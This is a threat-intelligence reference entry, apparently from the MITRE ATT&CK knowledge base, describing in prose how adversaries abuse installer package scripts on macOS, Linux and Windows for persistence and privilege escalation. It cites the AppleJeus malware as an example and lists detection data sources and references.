T1546.016 Installer Packages
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.5
Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS postinstall
scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a Launch Daemon) with the elevated permissions.14
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include preinst
, postinst
, prerm
, postrm
scripts and run as root when executed.
For Windows, the Microsoft Installer services uses .msi
files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged Prebuild
and Postbuild
events to run commands before or after a build when installing .msi files.32
Item | Value |
---|---|
ID | T1546.016 |
Sub-techniques | T1546.001, T1546.002, T1546.003, T1546.004, T1546.005, T1546.006, T1546.007, T1546.008, T1546.009, T1546.010, T1546.011, T1546.012, T1546.013, T1546.014, T1546.015, T1546.016 |
Tactics | TA0004, TA0003 |
Platforms | Linux, Windows, macOS |
Permissions required | User |
Version | 1.0 |
Created | 27 September 2022 |
Last Modified | 19 October 2022 |
Procedure Examples
ID | Name | Description |
---|---|---|
S0584 | AppleJeus | During AppleJeus‘s installation process, it uses postinstall scripts to extract a hidden plist from the application’s /Resources folder and execute the plist file as a Launch Daemon with elevated permissions.6 |
Detection
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0022 | File | File Creation |
DS0009 | Process | Process Creation |
References
-
Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022. ↩
-
Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022. ↩
-
Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022. ↩
-
Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021. ↩
-
Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022. ↩
-
Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022. ↩